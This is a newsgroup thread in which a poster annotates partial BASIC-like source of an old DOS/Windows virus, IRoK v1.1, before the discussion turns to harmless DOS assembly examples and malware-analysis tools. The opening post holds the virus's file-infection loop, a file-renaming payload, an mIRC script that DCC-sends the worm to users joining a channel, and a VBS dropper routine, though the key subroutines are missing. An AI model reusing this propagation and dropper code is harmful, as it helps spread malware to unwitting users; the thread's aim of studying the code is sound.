Let's walk through this virus source code, shall we?

The poster that goes by "Dustin" in this group posted the below. Don't know where he got it, probably cut and paste from somewhere, but I'd thought it could be a good exercise to go through it, line by line, and figure out what it does. I would appreciate any comments, and I would cross-post this but Google Groups no longer supports that feature.

RL

(My comments in lines having REM in CAPS)



write_file:
rem this routine will write selected bytes at whatever current position
rem from whatever buffer i choose into the file.
rem if the routine did not write all data ax will not equal cx upon
rem return from int call.
rem define dx register before calling this routine to point to the
rem memory address of the buffer area you want to write from. like so:
rem dx=varptr(buffer(0))
rem cx is how many bytes to write :)

REM AX, DX, CX are Intel Registers--how many such registers in the x86?--RL

if file_handle>4 then
ax=&hex4000
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
byteswritten=ax
endif
return

REM - What do the lines above do? Perhaps file_handle > 4 goes to long file names? What address is "&hex4000"? Why set bx,cx to these values, and what about na? Is this a 'null' or 'zero' for remaining registers?

read_file:
rem as the name implies, it reads bytes into a buffer. :-)
rem as with write_file, you need to predefine the dx register for the
rem buffer where you want the info stored. Like so: dx=varptr(buffer(0))
rem if you don't, this routine will not work, or will overwrite some
rem other section of memory. And for virus coding, this is very bad! :)
rem cx register is how many bytes to read :)

REM The above comments make no sense, not to mention the stupid smileys are annoying. But I don't see where the dx register was set to zero as he claims.


if file_handle>4 then
ax=&hex3f00
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
bytesread=ax
endif
return

REM Same as before, why? Why is file_handle not < 4? Why this cutoff? Perhaps very long file names are not supported by this program?

actual_virus_replication_start:
rem The actual code responsible for replication control has
rem moved down here. It's a new technique of coding that I intend
rem for my future viruses to use.
rem used to be called start_virus:
Rem this is the central virus infection code.
rem We will search for a maximum of 10 files per run.
errcode=0
attr=6
kewl=0
virii=7

REM What are these parameters 'errcode' 'attr' why set to 6? etc

       CALL SUB "FindFirstF" proc$ Attr ErrCode
REM what is proc$ ?  what is this line for?

WHILE ErrCode = 0
  CALL SUB "GetNameF" FileName$
  filename$=virupath$+filename$
  if sleepy=0 then
    gosub infect_check:
    if infected=0 then
      gosub lets_infect:
    endif
  else
    errcode=1
  endif
  CALL SUB "FindNextF" ErrCode
  if kewl=virii then
    errcode=1
  endif
WEND

REM Seems I understand what is going on at a conceptual level, but without the SUB functions it is not 100% clear. Need the gosub 'lets_infect'.

return

rem ***BEGIN PAYLOAD(S) CODE
payload:
clear_to_run=1
if hre$>"20" then

REM what is the above line doing?    

rem Executables remain offline for the remainder of the evening.
clear_to_run=0
endif


if min$="17" then


rem We're fixing to hose this dudes drive. Well, not really.

REM Typical stupid self-aggrandizing comment. Imagine--this guy is writing this for a future audience. Ironically, now that he has an audience (if in fact our Dustin is the real author) he will not or cannot explain his code. Wow, that speaks volumes. Either incompetence / fakery, excessive misplaced paranoia about the law and how it operates (and he's already in deep water, for reasons he does not even understand), or just playing drama games for his clueless kiddie script non-programmer followers.


rem We're renaming all files/directorys from current\root to
rem high ascii characters. The user doesn't actually lose anything,
rem he just (average user) doesn't know what to do at this point. ;p
rem this takes a second or two, so We're going to display some
rem text to keep the user busy.
cls
print"Some say the end is near. Some say we'll see Armageddon"
print"soon. I certainly hope we will. The only way to fix it is"
print"to flush it all away. Any fucking joint, any fuckin Day."
print""
print"Fuck all these gun toting hip gangster wannabes. Fuck your"
print"tattoes, fuck all you junkies and your short memory. I'm"
print"praying for rain, I'm prayin for tidal waves. I wanna see"
print"the ground give way. I wanna watch it all go down. Mah"
print"please flush it all away, I wanna see it go riding down. I"
print"wanna see it go riding. Watch you flush it all away."
print""
print"Where do bad folks go when they die? They don't goto heaven"
print"where the angels fly. They goto a lake of fire and fry. See"
print"em again till the 4th of July. People cry and people moan."
print"look for a dry place to call their own, look for a dry place"
print"to rest there bones."
print""
gosub whack_a_system:
print"Thanks for reading the text above, I've had enough time to"
print"remove the contents of your hard disk for you. :-)"
gosub keypress:

if min$="21" then
print"ž IRoK v1.1 - RaiD/SLAM[2000]"
gosub keypress:
call sub "Stars"
return
endif

REM What is the above? Perhaps to display something in stdout, the console? Is this a console mode MS-DOS virus?



rem End of payload jumpsystem!

mirc_drop:
filename$=drive$
filename$=filename$+"mirc\irok.exe"
script$=drive$
script$=script$+"mirc\script.ini"
gosub raidyworm:
rem Worm copy dumped
rem raidyworm returns filename$ that you sent.


REM Need subs--that's where the action is... Dustin did not provide. Scared again it seems.

tempfile$=filename$
filename$=script$
gosub set_attr:
filename$=tempfile$
rem drop script
open"o",2,script$
sensitivemsg=1
msg$="[script]|n0=on 1:JOIN:#:{|n1=if ($nick != $me) {|"
gosub dump_msg:
msg$="n2=    /dcc send $nick "
msg$=msg$+filename$
msg$=msg$+"|"
gosub dump_msg:
msg$="n3=  }|n4=}|n5=on 1:TEXT:irok:#:/amsg My computer is 0wned by IRoK v1.1|"
gosub dump_msg:
close 2
return

vbsdrop:
rem we have to drop a piece of VBS material. We have an external routine
rem which handles this. We need only create the worm file, and then
rem call the routine. However, before we do this, We check to see if we've
rem done this before. If so, we don't ever do it again. Well, unless the
rem user deletes our marker.
vbsdrop=0
open"i",2,"c:\windows\system\winrde.dll"
if error>0 then
rem we haven't done this, ok kewl.
vbsdrop=1
endif
close 2
if vbsdrop=1 then
tempname$=filename$
filename$="c:\windows\system\irok.exe"
gosub raidyworm:
rem Ok, worms dropped.
filename$=tempname$
call sub "vbsroutine"
rem Now create marker.
open"o",2,"c:\windows\system\winrde.dll"
for x=1 to 8095
print #2,x
next x
close 2
endif
return

whack_a_system:
rem Simple routine. One line. ;p
call sub "drago"
return

raidyworm:
rem worm dump
rem specify filename to dump too in filename$
newattr=0
gosub set_attr:
gosub create_file:
tempsize=virus_size
tempsize=tempsize+1
bytesize=tempsize
dx=varptr(virus_data(0))
gosub write_file:
gosub close_file:
rem One worm to order.
return

rem ***--> End of Payload section.



It's missing stuff.  See the above and comment.


RL

PS--I challenge Dustin to show his 'mastery' of assembly by simply posting here a simple subroutine in assembly that will display "FSCK YOU" on the screen if a user runs the program. Simple enough, but if Dustin is a cut-and-paste kiddie scripter as I suspect he is, he won't find this on the net and will fail this simple test.


Re: Let's walk through this virus source code, shall we?


The poster that goes by "Dustin" in this group posted the below.  Don't know
where he got it, probably cut and paste from somewhere, but I'd thought it
could be a good exercise to go through it, line by line, and figure out what
it does.  I would appreciate any comments, and I would cross-post this but
Google Groups no longer supports that feature.

RL
Teenage jerk-off!!
Buffalo



Re: Let's walk through this virus source code, shall we?



hehehe.. I'm starting to wonder about Ray's age myself.. No experience with
older languages, inability to understand a very simple language...

and he keeps telling me I'm in my 60s. :)


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the way.
I ain't got much time. Young ones close behind. I can't wait in line.


Re: Let's walk through this virus source code, shall we?

Dustin was thinking very hard :

That goes a long way toward explaining why he thinks everyone *else* is
a poseur.



Re: Let's walk through this virus source code, shall we?



Just use nasm. Copy my post source into notepad, be sure to save it as an
ascii text! file.

Make life easier for yourself.

--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the way.
I ain't got much time. Young ones close behind. I can't wait in line.


Re: Let's walk through this virus source code, shall we?



nasm -f obj hello.asm
(you'll need a linker. google for msdos link.exe or tlink.exe)
link hello2
enter
enter
enter
you'll get an exe file.



--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the way.
I ain't got much time. Young ones close behind. I can't wait in line.


Re: Let's walk through this virus source code, shall we?

"G. Morgan" wrote:


a
mov dx,010c
mov ah,09
int 21
mov ax,4c00
int 21
db 42
db 6f
db 6f
db 21
db 24

g



Re: Let's walk through this virus source code, shall we?

p5b8pIo7NnZ2dnUVZ8tOdnZ2d@brightview.co.uk:


Ant. :) Why you... lol



--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.


Re: Let's walk through this virus source code, shall we?

"Dustin" wrote:


Why not? It gives me an opportunity to re-learn stuff. I thought
int 21, function 09 took a null-terminated string and had to check my
Advanced MS-DOS Programming book when the output was followed by
garbage!
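An added model (Python, not code from the thread) of the two int 21h services under discussion: the AH=09h '$' terminator Ant describes above, and the AH=40h write behind the `ax=&hex4000` / `if file_handle>4` lines in the walk-through at the top of the thread. It assumes a single 64 KiB data segment held as a bytearray, with the bytes from Ant's DEBUG listing placed at offset 010c.

```python
"""Model of two DOS int 21h services that come up in this thread: AH=09h (print a
'$'-terminated string) and AH=40h (write CX bytes from DS:DX to handle BX).

Added example, not code from the thread.  A 64 KiB segment is a bytearray and
DS:DX an offset into it.  The bytes 42 6f 6f 21 24 at offset 010c are the ones
from Ant's DEBUG listing (DEBUG takes hex), i.e. "Boo!$"."""
SEGMENT_SIZE = 0x10000
DOLLAR = 0x24
# Handles DOS opens for every program before it runs; the first handle a program
# gets back from create/open is therefore normally 5, which is why a guard like
# the posted `if file_handle>4` separates "a file we opened" from the devices.
DEVICE_HANDLES = {0: "stdin", 1: "stdout", 2: "stderr", 3: "aux", 4: "prn"}

def make_segment():
    seg = bytearray(SEGMENT_SIZE)          # zero-filled 64 KiB data segment
    seg[0x10C:0x111] = b"Boo!$"            # db 42 6f 6f 21 24
    return seg

def int21_ah09(seg, dx):
    """AH=09h: emit bytes from DS:DX until a '$' (0x24), the offset wrapping at 64 KiB.
    A NUL-terminated string has no '$', so everything after it is printed too, until
    some unrelated 0x24 byte turns up: the "garbage" described above.  Real DOS never
    stops if the segment holds no '$' at all; this model stops after one full pass."""
    out = bytearray()
    for i in range(SEGMENT_SIZE):
        b = seg[(dx + i) & 0xFFFF]
        if b == DOLLAR:
            break
        out.append(b)
    return bytes(out)

def int21_ah40(seg, bx, cx, dx, files):
    """AH=40h: write CX bytes from DS:DX to handle BX.  `files` maps handles the
    program opened (5 and up) to bytearrays.  Returns (carry, ax, target): carry
    clear with AX = bytes written on success, carry set with AX = 6 ("invalid
    handle") otherwise, as DOS does."""
    data = bytes(seg[(dx + i) & 0xFFFF] for i in range(cx))
    if bx in DEVICE_HANDLES:
        return (False, len(data), DEVICE_HANDLES[bx])   # console/printer, not a file
    if bx not in files:
        return (True, 6, None)
    files[bx].extend(data)
    return (False, len(data), "file")
```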



Re: Let's walk through this virus source code, shall we?

dnZ2d@brightview.co.uk:


No, it's good, dude. I need someone else who also knows asm; I bow to your
superior knowledge of it tho, to double check mine. :) If you don't mind,
I mean.

I did the same damn thing as you when I wrote comit. I had a WTF moment.
;p


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the way.
I ain't got much time. Young ones close behind. I can't wait in line.


Re: Let's walk through this virus source code, shall we?

"Dustin" wrote:


You're too kind (but I don't mind)!


I get those WTF moments all the time when disassembling malware.
Sometimes you miss the obvious and sometimes it's a new anti-analysis
trick or unfamiliar API. It's a continual learning process.



Re: Let's walk through this virus source code, shall we?



Well. Seems I'm locked out of 64bit malware samples. I can't debug them. I
don't have a 64bit platform. Any suggestions?


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the way.
I ain't got much time. Young ones close behind. I can't wait in line.


Re: Let's walk through this virus source code, shall we?

"Dustin" wrote:


Same here but I rarely see them. I think the only 64-bit ones I've
got are rootkit loaders. CFF Explorer from ntcore.com can create a
disassembly listing of them without needing the hardware.



Re: Let's walk through this virus source code, shall we?



Ahh, thanks.. a disassembly is better than nothing. :)


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the way.
I ain't got much time. Young ones close behind. I can't wait in line.


Re: Let's walk through this virus source code, shall we?



Excellent.

Would you care to provide your opinion on my work below: Basically let
people know if it's bullshit code I came up with out of thin air, or
actually will function as written... [g] And if you don't mind, would
you also confirm my history for Ray and that irok is mine, as well as
this? Thanks. hehe.

segment code

start:
; point DS at the data segment and SS:SP at the top of the stack segment
mov ax,data
mov ds,ax
mov ax,stack
mov ss,ax
mov sp,stacktop

; int 21h, AH=09h: print the '$'-terminated string at DS:DX
mov dx,hello
mov ah,9
int 0x21

; int 21h, AH=3Ch: create the file named at DS:DX with attributes CX; handle comes back in AX
mov ah,0x3c
mov cx,0
mov dx,files
int 0x21

mov [filehnd],ax

; int 21h, AH=40h: write CX bytes from DS:DX to handle BX
mov ah,0x40
mov bx,[filehnd]
mov cx,[msglength]
mov dx,hello
int 0x21

; int 21h, AH=3Eh: close handle BX (the handle value, not the address of filehnd)
mov ah,0x3e
mov bx,[filehnd]
int 0x21

; int 21h, AH=4Ch: terminate with return code 0
mov ax,0x4c00
int 0x21

segment data

hello: db 'Hi! Ray How did I get created Today?',13,10,'$'
files db 'ray.txt', 0
filehnd dw 1
msglength dw 38          ; text plus CR/LF, without the '$'


segment stack stack
resb 64
stacktop:



--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.


Re: Let's walk through this virus source code, shall we?

"Dustin" wrote:


Yes, it looks fine - apart from the fact there's no error checking,
particularly on the "create file" operation. However, error handling
is often omitted in examples for simplicity so, no biggie.


I'm not sure that what I say will persuade Ray of anything. He seems
not to have read my comments and description of DOS interrupts in the
"hello world" code or has not understood (going by his reply to your
comments on the code). On the other hand, he may not be interested so
much in a dialog with me as trolling you. Anyway, for what it's worth,
you are the former VXer Raid and you wrote Irok. I've no reason to
suspect that you did not write this code example and I'm sure you
understand it.



Re: Let's walk through this virus source code, shall we?

On Saturday, August 4, 2012 9:01:03 AM UTC-4, Ant wrote:

No, I disagree, Ant. It's true I troll but I also make substantive points. This
person is clearly attention seeking and he has not demonstrated he knows
anything about the code they copied and pasted.

I did not respond to your posts because I lost them--using Google as a
newsreader--and I cannot easily find anything in a long thread.

I have downloaded a book on assembly and will study it in due time. Right now
I'm learning F# just for fun.

Thanks for your insights.

RL

Re: Let's walk through this virus source code, shall we?



I appreciate you taking the time to do this for me, Ant. Thanks very
much.


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.


Re: Let's walk through this virus source code, shall we?

on 7/28/2012, Dustin supposed :

That's how vulnerabilities get written, the easiest thing to write. :o)



Re: Let's walk through this virus source code, shall we?

dnZ2d@brightview.co.uk:


You know.. come to think of it, I think the garbage is your 64k memory
space being dumped...


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the way.
I ain't got much time. Young ones close behind. I can't wait in line.

